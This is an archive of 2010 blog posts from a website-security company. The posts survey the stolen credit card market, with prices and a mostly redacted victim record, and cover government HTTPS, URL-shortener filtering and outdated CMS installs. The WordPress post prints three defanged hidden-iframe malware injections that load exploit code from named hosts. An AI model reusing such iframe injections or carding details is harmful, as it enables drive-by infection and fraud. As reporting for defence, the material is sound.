Archive

Archive for the ‘News’ Category

The “Underground” Credit Card Blackmarket

March 3rd, 2010

Credit card data has been traded on the cyber black-market for a number of years. The relatively recent breaches of TJX Companies (owner of T.J. Maxx) and Heartland Payment Systems show the extent to which criminals will go in order to harvest credit card numbers, social security numbers, names, addresses and more. All this legitimate (but stolen) information fuels a world of cyber crime.

In this article we show that, unlike what you might think, the credit card black-market operates very much in the open. Below we point out websites, which can be used to tap into the cyber black-market and find stolen credit card numbers and the associated credentials to purchase for any purpose they desire. We also show instant messenger handles, emails and details of what cyber criminals are selling on the Internet.

We analyzed 429 unique domains and 615 unique URLs. Each of these URLs contained information about buying stolen credit card information. Each URL lead to a web page where cyber-criminals have posted details about how to interact with them and buy stolen financial credentials. In the majority of cases, cyber criminals who are selling this information can provide one of the following types of data.

The data for this article was collected between February 27th and March 2nd, 2010.

Basic Credit Card Information Offers:

Usually consists of credit card number, type, expiration date and CVV.

USA & CANADA CCV2

VISA/Mastercard ~ 2USD/each
AmEX/Discover   ~ 4 USD/each

UK & WU CVV2

VISA/Mastercard ~ 3USD/each
AmEx/Discover   ~ 5USD/each

Premium Credit Card Information Offers:

Usually consists of credit card number, type, expiration date, CVV, SSN, Home Address, Full Name, Date of Birth and much more.

USA & CANADA CCV2

VISA/Mastercard ~ $35/each

UK & EU

VISA/Mastercard ~ $40/each

ACCOUNT INFORMATION:
First Name: xxxxx
Last Name: xxxxx
Address: xxxxx xxxxx xxxxx xxxxx
Apt:
City: Homestaed
State: FL
Zip: xxxxx
Home Phone: (xxxxx)xxxxx-xxxxx
Work Phone: (xxxxx)xxxxx-xxxxx
Email: xxxxx@yahoo.com
SSN: xxxxx-xxxxx-xxxxx
License Number: xxxxx-xxxxx-xxxxx-xxxxx-xxxxx
License State: FL
DOB: 09/xxxxx/xxxxx

PAYMENT INFORMATION:
Credit Card Type: VISA
Number: xxxxxxxxxxxxxxx
CCV: 889
Expiration Date: 11/2008
Name: xxxxx xxxxx
Card Name First: xxxxx
Card Name Last: xxxxx

PayPal Information Offers:

Verified account                 ~ 20USD/each
Verified account with email pin  ~ 25USD/each
Verified acccount with full info ~ 35USD/each
unverified account               ~ 10USD/each

Some domains host multiple instances of stolen Credit Card Ads, (CC-Ads). We present the frequency distribution of CC-Ads on each unique domain below.

Frequency of CC-Ads on each unique domain.

Frequency of CC-Ads on each unique domain.

Interesting Highlights:

  • None of the websites advertising stolen credit card data were blacklisted by Google’s Safe Browsing List. This could potentially indicate that cyber criminals are conscientious of not discouraging visitors to these sites.
  • Cyber criminals prefer to get paid via Liberty Reserve and Western Union money transfer services.
  • Some cyber criminals have used images to provide quotations [img].
  • Yahoo.com seems to be the email and instant messaging service preferred by cyber criminals.
  • Nearly 75% of sites with CC-Ads are located in the US (see graph below).
IP Geo-location for websites with CC-Ads.

IP Geo-location for websites with CC-Ads.

Conclusion:

It is clear from the current state of the credit card black-market that cyber criminals can operate much too easily on the Internet. They are not afraid to put out their email addresses, in some cases phone numbers and other credentials in their advertisements. It seems that the black market for cyber criminals is not underground at all. In fact, it’s very “in your face.” Clearly a more concerted effort is required to clamp down on this problem. Simply tying up loose ends on the enterprise side is not enough to combat this problem when there is virtually nothing to stop criminals from touting their stolen wares freely in the Internet.
Read more…

News, Report, Security , , , , ,

Virus Infects 13 Million PCs, Steals Credit Card Numbers

March 2nd, 2010

“Spain Busts Hackers for Infecting 13 Million PCs”

Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shutdown the Mariposa bot-net on December 23, 2009 although the details of what is being called the “largest cyber-raid to date” are just being released.

Infection Statistics:

  • 190 countries
  • 40 of the largest financial institutions
  • 50% of 1,000 largest companies

News, Security , , , , , , ,

Do Government Websites Care About HTTPS?

February 25th, 2010

Government websites play a critical role in the transfer of information to citizens, visitors, businessmen and others throughout their lives. Most importantly many people trust government websites implicitly. By virtue of this immense trust placed in websites which are relied on for information dissemination and collection by the government, one would expect that something as basic as SSL authentication (via certificates) would be in use by these websites to prove unambiguously to visitors that they are really connecting to the website they expect.

Consider the fact that malicious individuals and organizations have already targeted government organizations including the FDIC, IRS, FBI and many more with success. The government response trying to educate the masses can be found in many places. [1] [2] [3]

The goal of this experiment:

  • To determine whether government sites provide authentication information using HTTPS.
  • To identify characteristics of government websites using or not using HTTPS.

Experiment methodology:

An initial corpus of 150 government websites was mined (via USA.gov). Each website was tested for three signs that indicate whether they employ any authentication mechanism to prove their identity to a visitor.

This experiment was conducted between February 24th and February 25th, 2010.

The three points are listed below:

  1. Does the website offer a SSL connection secured by a certificate?
    • If it does, we identify the issuer and the expiration date.
  2. Does the website respond to the HTTPS request within 60 seconds?
    • If it does not, we identify the server as mis-configured.
  3. Does the website seem to have pages, which have an “https://” in the URL?
    • We find these pages as indexed by Google (e.g. https://secure.site.gov/login.asp).

We present the most interesting results here:

  • Only 53% of government sites offer an SSL certificate to prove their identity.
    Note: The certificates for these sites will not expire in less than 30 days.
  • Approximately 6% of government sites have self-signed SSL certificates or certificates signed by authorities which are not widely recognized.
    Note: Accessing these websites via a modern browser will cause a warning message to be displayed.
  • Approximately 13% of government sites use expired SSL certificates to prove their identity.
  • Approximately 1% of government sites have credentials which will expire in less than 30 days.
  • A whopping 33% of government sites with HTTPS are mis-configured. However, they work fine with HTTP.
Significant numbers of government websites are not using authentication mechanisms effectively.

Significant numbers of government websites are not using authentication mechanisms effectively.

Conclusion:

This limited experiment shows that websites operated by the government have a long way to go in terms of proving their identity to end users. These issues should not be treated lightly as they provide impetus to malicious individuals to develop phishing scams targeting government owned infrastructure.

Note: Due to the sensitive nature of this information we will not disclose specific government sites with security issues.

News, Report, Security , ,

stopthehacker.com Attends Technology Forum

February 22nd, 2010

The stopthehacker.com team traveled to Omaha, Nebraska, in early February to meet with other cyber security companies and corporate, academic and government leaders. Anirban Banerjee, stopthehacker.com co-founder, appeared in a video interview conducted by Jeff Slobotski of the Silicon Prairie News.

Watch Anirban describe the goals of stopthehacker.com:

Thanks again to the Silicon Prairie News for covering us at the event!

Company, News , , , ,

The Curse of the URL Shorteners: How Safe Are They?

February 19th, 2010

URL shortening services have become all the rage on the Internet. These services take a long URL as input and produce a short, easy to use, URL as an output. Simple! By virtue of their ease of use, millions of Internet surfers use them to post messages on twitter. In fact, URL Shortening services like bit.ly have garnered so much attention that even giants like Google and Microsoft have jumped onto the URL shortening bandwagon.

Case in point:

These URL shortening services are godsend for Internet surfers tired of copying and pasting long, ugly looking, URLs. But hold on a minute! All is not hunky dory in URL Shortening Land.

Due to processes inherent to “URL Shortening,” the original URL an Internet surfer might like to shorten is, for all purposes, being obfuscated. Is this a problem? Yes. Why, you ask? Consider the fact that people, not even necessarily tech-savvy ones, have learned to double check the links present in their emails and on websites. They even have help from various browser plugins, but in general, users are smartening up. When these same people see “shortened” links, they have no way to make a judgment call on whether visiting the link is safe, or not. For example, you may recognize www.stopthehacker.com as being a benign, safe to visit link, but what about bit.ly/oJMrP or bit.ly/dc38ze?

Articles published from credible sources, like ISC SANS, show that URL shortening services, when compromised, can provide an excellent mechanism for malicious hackers to infect unsuspecting visitors. Criminals use these services to bypass Google’s Safe Browsing service, which is used by popular browsers.

To combat this growing menace, URL shortening services have partnered with security companies to identify malicious URLs and websites. Some of them even use the SURBL blacklists to identify if someone has tried to link to a malicious website.

This article attempts to identify the effectiveness of security measures put in place by the various URL shortening services.

This experiment answers the following questions:

  • Do URL shortening services have any kind of security measures in place?
  • How effective are these security measures?

The 25 URL shortening services evaluated in this article are listed below:

We compare 25 URL shortening services listed below. Each URL shortening service is analyzed to measure the effectiveness of their security measures. We use a two stage process to evaluate the security implemented by each service.

snipr.com
budurl.com
bit.ly
short.to
twurl.nl
chilp.it
fon.gs
ub0.cc
snurl.com
fwd4.me
short.ie
a.gd
hurl.ws
kl.am
to.ly
hex.io
tr.im
cli.gs
urlborg.com
is.gd
sn.im
ur1.ca
tweetburner.com
tinyurl.com
snipurl.com

Experiment methodology:

An initial corpus of 932 websites was obtained from Malware Patrol a well respected source of information about malware infected websites, which receives nearly 3,500,000 hits/month. This experiment was conducted between February 2nd and February 4th, 2010.

For each URL obtained from Malware Patrol, we attempt to create shortened URLs for each site domain and full URL using each of the 25 services.

We denote a service as Stage 1 Compliant if it appears to use a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain. Does the URL shortening service allow a user to create a URL pointing to a malicious domain (e.g. http://www.badsite.dom)?

We denote a service as Stage 2 Compliant if it uses a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain or malicious full URL hosted on that domain. Does the URL shortening service allow a user to create a URL pointing to a malicious link hosted on a malicious domain (e.g. http://www.badsite.dom/badfolder/badfile)?

We present the most interesting results in brief:

  • Approximately 68% of URL shortening services were Stage 1 Compliant.
  • Approximately 56% of URL shortening services were exclusively Stage 2 Compliant.
  • Approximately 52% of URL shortening services were both Stage 1 Compliant and Stage 2 Compliant (see graph below).

Observations on specific URL shortening services:

  • bit.ly seems to favor blocking malicious domains rather than specific links.
  • fwd4.me, hurl.ws and urlborg.com seem to favor blocking malicious links rather than specific domains.
  • bit.ly failed to qualify as Stage 2 Compliant due to 0.5% of tested URLs.
  • fwd4.me failed to qualify as Stage 1 Compliant due to 9.8% of tested URLs.
  • hurl.ws failed to qualify as Stage 1 Compliant due to 0.3% of tested URLs.
  • urlborg.com failed to qualify as Stage 1 Compliant due to 0.3% of tested URLs.

Venn Diagram depicting URL filtering capabilities of URL shortening services. Only about half of the most popular URL shortening services are effective at blocking malicious URLs.

Stage 1 Compliant and Stage 2 Compliant services:

budurl.com
cli.gs
fon.gs
hex.io
is.gd
kl.am
sn.im
snipr.com
snipurl.com
snurl.com
to.ly
tr.im
ub0.cc

Deeper security issues remain:

It seems that popular services like bit.ly, which do try to use blacklists in order to prevent malicious hackers from using their services and pointing to bad websites, can still be easily fooled by chaining together shortened URLs created by another service. We have found that if a malicious user can create a shortened URL using a service that does not implement blacklist checks or is not effective, then a service like bit.ly can be tricked into redirecting the visitor via the malicious shortened URL to a malicious domain. Effectively, users can be redirected to a malicious site regardless of bit.ly performing all its checks. See the appendix for an example below (wget log).

Conclusion:

This limited experiment shows that URL shortening services have a long way to go before Internet users can trust them to deliver safe links. About half of the most popular URL shortening services seem to be somewhat effective at blocking access to well known malicious URLs that can be found on blacklists. It remains to be seen if these URL shortening services can improve and provide a safer web experience for their users.

Read more…

News, Report, Security , , , ,

Analyzing Popular CMSs: Are vBulletin Users at Risk?

February 8th, 2010

This article is the last in our series of articles on CMS analysis, this time we will be focusing on vBulletin. We have previously profiled Joomla, WordPress, Drupal and phpBB.

vBulletin is a little bit different than the list of CMSes we have been analyzing in this series. The first and most apparent being that it is not a free piece of software. The vBulletin site displays a cost of $195-$285 for a new license. The obvious question then, is why do people pay for this CMS when there are other good CMSs available for free? The answer lies in the varied list of features, such as a built-in photo album, event management and many other interesting and helpful features. Add to this good support, compatibility with existing software, many themes, built-in integration for payment engines and advertisement support… it’s not hard to see why vBulletin has acquired a large fan base.

Next, we will take a closer look at vBulletin to understand security issues facing active installations seen publicly on the Internet.

The aim of this experiment:

  • To determine the number of vBulletin sites using older versions of the CMS package (and hence vulnerable to attacks).
  • To identify the associated scripts vBulletin that users install in addition to core vBulletin functionality.
  • Identify the vulnerabilities of using the associated scripts.

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed vBulletin. Understandably, not all 100,000 websites would actually be using vBulletin. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by vBulletin or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between February 5th and February 8th, 2010.

Distribution of vBulletin versions:

In 93.09% of sites running on vBulletin the version number could be identified. We found the following distribution of vBulletin versions in the websites examined (where versions of installations could be determined). A more detailed breakdown of the distribution of vBulletin versions can be seen at the end of this article.

Significant numbers of older vBulletin installations are present on the Internet.

Significant numbers of older vBulletin installations are present on the Internet.

Note: Publicly available information about exploits for vBulletin 3.x.x and earlier versions exist. [1] [2]

We present the most interesting results here:

Conclusion:

This limited experiment shows that like WordPress, vBulletin also suffers from a large number of vulnerable installations being available on the Internet. It is intriguing to see that a CMS system, which is not free, and is tightly controlled is not kept up to date across the board. Consider the case of Drupal, where we observed that the variety in the versions of various installations is very low. The natural question at this point is: why is a free CMS system like Drupal doing better, security-wise, than a commercial CMS system like vBulletin? Why are most Drupal installations up to date. One thing to note though is that like Drupal and phpBB, vBulletin installations also seem to be relatively safe from the most prevalent malware. Most Iframes on vBulletin sites are Ads, a likely revenue stream for most forum admins.

The fact remains that there many vulnerable installations of vBulletin which can fall prey to malicious hackers.

Till next time.
Read more…

News, Report, Security , , ,

Analyzing Popular CMSs: Are WordPress Users at Risk?

February 2nd, 2010

Following up on our last article, this time we will be discussing issues relevant to, likely, the most popular CMS software package available today: WordPressWordPress, is used by a plethora of individuals and organizations, from bloggers to content publishers, news media outlets and many more. The great thing about this particular CMS is the level to which it can be customized and the number of plugins that exist for it.

WordPress is a prime example of a popular CMS. With more than 8,176 plugins and 73,037,498 downloads, this particular CMS package is extremely popular! I would agree with the statement on the WordPress site which proclaims: “WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability.” It is.

WordPress also offers the flexibility to manage content easily, add attractive themes and customize webpages to your hearts content. And again quoting the main site: “Plugins can extend WordPress to do almost anything you can imagine.” I would agree with this too.

In this post we will be looking at WordPress closely to understand any interesting properties of the active installations publicly seen on the Internet.

The aim of this experiment:

  • To determine the number of WordPress sites using older versions of the CMS package (and hence vulnerable to attacks).
  • What are the associated scripts do WordPress users use in addition to core WordPress functionality?
  • What are the vulnerabilities of using the associated scripts?

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed WordPress. Understandably, not all 100,000 websites would actually be using WordPress. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by WordPress or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between January 28th and January 30th, 2010.

Distribution of WordPress versions:

  • 30.9% of sites were running version 2.9.1
  • 4.7% of sites were running version 2.9
  • 9.14% of sites were running version 2.8.6
  • 4.7% of sites were running version 2.8.5
  • 21.42% of sites were running version 2.8.4
  • 7.1% of sites were running version 2.8.2
  • 9.14% of sites were running version 2.7.1
  • 2.3% of sites were running version 2.6.2
  • 2.3% of sites were running version 2.6
  • 2.3% of sites were running version 2.1.3
  • 2.3% of sites were running version 2.0.4

We found the following distribution of WordPress versions in the websites examined (where versions of installations could be determined).
Note: Publicly available information about exploits for WordPress version < 2.8.6 exist.

We present the most interesting results in brief:

Examples of malware found:

Now we present some examples of the non-obfuscated malware that was detected on some of the analyzed sites.

Example Code #1,  detected on: olgamake.com/wp-login.php?action=lostpassword

<if ra e src="hxxp://a151.scrappi ng.cc:80 80/ts/in. cgi ?op en" width=971 height=0 style="visibility: hi dden"></i fra m e>

Example Code #2,  detected on: makinghimknown.com/wp-login.php

<if ra e src="src="hxxp://ke ymydoma ins.com/" width="3" height="2"></i fra m e>

Example Code #3,  detected on: bisoppreview.com/wp-login.php

<if ra e src="hxxp://ntw porta l.com/" w idth="2" hei ght="4"</i fra m e>

Conclusion:

This limited experiment shows that there are many older WordPress installations active on the Internet. Furthermore, some of them are have been infected by non-obfuscated Iframes which point to malicious websites to load exploit code dynamically. WordPress makes for an easy target by lieu of its popularity and wide installation base. The people associated with this CMS software take security very seriously and have done a great job releasing security patches and stable releases. However, the fact remains that vulnerable versions of WordPress are live on the Internet and are hosting malware, primarily via infected Iframes.

Till next time.

News, Report , , , ,

Analyzing Popular CMSs: Are Joomla Users at Risk?

February 1st, 2010

In this series of articles, we will be discussing issues relevant to popular Content Management Systems (CMS). These software packages make it relatively simple for web-administrators and lay people to host a website or an Internet forum and manage the content on it. Using a CMS, one can easily keep track of various versions of web-pages, allow visitors to contribute to the pages and host complex discussion forums too.

CMS software packages have gained widespread popularity owing to the easy to use interface they provide to web-administrators. CMS packages can be easy to set up. Most web hosting companies already have CMS packages ready to be set up on their client’s account, all the clients need to do is click a button in their hosting control panel! Furthermore, maintaining web-pages using CMS software takes away the pain of keeping track of multiple versions, manually granting user permissions and other mundane issues.

Joomla is prime example of popular CMS packages. With thousands of downloads and upwards of 7,000 followers on Twitter, this CMS package is extremely popular among web-administrators and content publishers. Joomla offers the flexibility to manage content easily, add attractive themes and customize web-pages to your hearts content. All this can be achieved without having any programming experience.

In this series of posts, we will be looking at five popular CMSs. Joomla is the first one on which we will focus.

The aim of the experiment:

  • To determine the number of Joomla sites using older versions of the CMS package (and hence vulnerable to attacks).
  • What associated scripts do Joomla users use in addition to core Joomla functionality?
  • What are the vulnerabilities of using the associated scripts?

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed Joomla. Understandably, not all 100,000 websites would actually be using Joomla. Of these, approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by Joomla. Each website was also cross-referenced with the Google Safe Browsing List. The experiment was completed between January 27th and January 29th, 2010.

We present the most interesting results in brief:

This limited experiment showed that there is a correlation between Joomla installations and vulnerabilities targeted by hackers to spread malware. It will be interesting to compare this trend with the trends of the CMS packages that we will analyze in the coming days. Nonetheless, it is heartening to see that none of the websites hosting Joomla 1.5 were actually listed on Google’s Safe Browsing List.

Till next time.
Read more…

News, Report , , ,

“Online Pharmacy” Spam Stalks Internet Forums/Boards

January 26th, 2010

Malicious hackers have, for many years, been offering services to unscrupulous individuals and companies for monetary compensation. With the growth of Email Spam advertising everything from medical supplements to cars and lottery tickets, email scrubbers and filters have taken the game up a notch by implementing ever increasing layers of complexity to cut down on such spam. In turn, hackers have started to focus on advertising spam, such as medication and fraudulent scams by compromising web-based message boards and forums.

Hackers employ two basic techniques:

  • Creating large numbers of users on forums. These accounts are then used to post spam on the message boards.
  • Exploiting Web Application vulnerabilities in the software used to run the forum.

Approximately two weeks ago, Lenny Zeltser, from ISC SANS, posted an informative article about online pharmacy ads popping up on message boards. In this vein we have conducted a limited experiment with about 14,000 websites which contain spam announcing online pharmacies.

The aim of the experiment:

  • What percentage of websites which advertise online pharmacies are message boards and Internet forums?
  • What Web Applications, e.g. CMS packages, are used on the message boards that are compromised?

We believe this will provide us with a rough estimate of how focused are hackers toward using message boards and forums on the Internet to advertise spam. From another perspective, it will provide us some idea of how vulnerable websites are if it hosts a message board or forum from being abused by hackers.

Testing methodology:

We have used Google to mine the websites which contain certain keyword patterns such as “buy zocor online”, or “buy brand kamagra online” etc. Once the links suggested by Google were mined, each of the websites was tested against Google’s Safe Browsing List to determine if they had hosted malware (according to Google). Next, an analysis was done to determine if the link(s) mined from Google pointed to a forum or message board. This was done by identifying the presence of multiple strings inside a link. For example, if a link has the keywords “topic”, “view”, “thread” or similar keywords, including characters associated with dynamic page generation, it is probably hosting a message board or forum.

The test was conducted between January 21st and January 23rd, 2010.

Popular software packages installed on compromised forums and message boards.

Popular software packages installed on compromised forums and message boards.

We present the most interesting results below:

  • 47.9% of websites displaying “online pharmacy” spam are message boards and forums.
  • None of the websites advertising “online pharmacy” spam were listed on Google Safe Browsing List.
  • 20.28% of forums displaying “online pharmacy” spam were using Jquery.
  • 15.73% of forums displaying “online pharmacy” spam were using phpBB.
  • 11.54% of forums displaying “online pharmacy” spam were using WordPress.
  • 10.84 % of forums displaying “online pharmacy” spam were using Mootools.

These results and other software packages, helper-scripts, tracking-code are depicted in the graph presented above.

This small experiment shows that a high percentage of websites displaying online spam campaigns are message boards or forums. This indicates that there are many unsecured software installations and older software packages still in use which are often exploited by malicious individuals to post spam. Further, it seems that most sites which were hacked are using jQuery. This supports our previous observations regarding jQuery scripts being used to push malware to unsuspecting visitors.

Read more…

Company, News, Report , , , ,

Where Can You Find (2.8 million) Safe Websites?

January 19th, 2010

Hackers are hitting websites hard and fast. Everyday, upwards of 6,000 new websites are compromised by malware due to code injection, FTP credential compromise, weak server security, web-application flaws and the full gamut of other security issues.

In this vein, any system used to determine whether a website is clean or infected, needs to be able to handle large numbers of sites for analysis. This ability ensures a high throughput rate when analyzing “suspect” sites.

One of our goals at StopTheHacker.com, is to target throughput rates in excess of 1,000,000 sites per day. This obviously necessitates an automated process with high reliability and accuracy (we have it). To develop such an automated process, we focus heavily on advanced Machine Learning and Artificial Intelligence techniques which can learn on the fly from compromised websites and update to catch even more bad websites. All on the fly.

In order to develop training sets for machine-learning based automated solutions, one needs to get hold of a massive dataset. We recently profiled over 2.8 million websites (2,800,560 to be exact). What dataset is this? All these profiled sites were sourced from DMOZ. Surprisingly, none of these websites are listed in the Google Safe Browsing List as of January 19, 2010.
Note: DMOZ is a user-edited directory of sites (which provided a good starting point for this experiment).

Each website is classified according to a categorization scheme described here. We used the description to download and analyze around 2.8 million sites. Each site name was entered in a program which calculated a hash of the site name and looked it up on the Google Safe Browsing List to determine if the website was on the malware list or not.

Interestingly, we did not find any of the sites on the Google Safe Browsing List. This definitely adds a feather of sorts to DMOZ Directory’s proverbial hat. I think they might just be able to claim that they are the “largest and safest human-edited directory on the web”!

A graphical representation of the top 50 categories, sorted by those having the most websites is presented, followed by a list of the top 100 categories.
Read more…

News, Report, Security ,